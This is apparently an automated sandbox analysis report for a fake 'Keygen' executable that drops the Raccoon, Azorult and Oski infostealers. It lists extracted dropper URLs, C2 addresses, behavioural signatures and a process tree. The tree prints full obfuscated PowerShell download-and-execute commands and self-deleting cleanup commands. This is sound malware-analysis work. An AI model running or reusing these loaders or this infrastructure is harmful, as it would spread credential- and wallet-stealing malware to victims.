Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    68s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (28) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

cf43f57ef5d1c064538f5f9d27891dc66c96dad8

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (28) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (28) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\4A78.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (28) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1760
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A78.tmp\m.hta"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1572
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
          • C:\Users\Public\pat.exe
            "C:\Users\Public\pat.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2648
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2716
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2828
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2828 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\449329989687222\\* & exit
                  8⤵
                    PID:2316
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2828
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2752
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2736
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2844
              • C:\Users\Public\pat.exe
                "C:\Users\Public\pat.exe"
                6⤵
                • Executes dropped EXE
                PID:2796
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A78.tmp\m1.hta"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1636
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A78.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1904
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:268
            • C:\Users\Public\pfd.exe
              "C:\Users\Public\pfd.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2548
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2424
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1644
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2736
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2976
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:832
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2884
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2884 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\110762017410225\\* & exit
                      9⤵
                        PID:1316
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2884
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1844
                • C:\Users\Public\pfd.exe
                  "C:\Users\Public\pfd.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1104
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A78.tmp\b1.hta"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1872
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
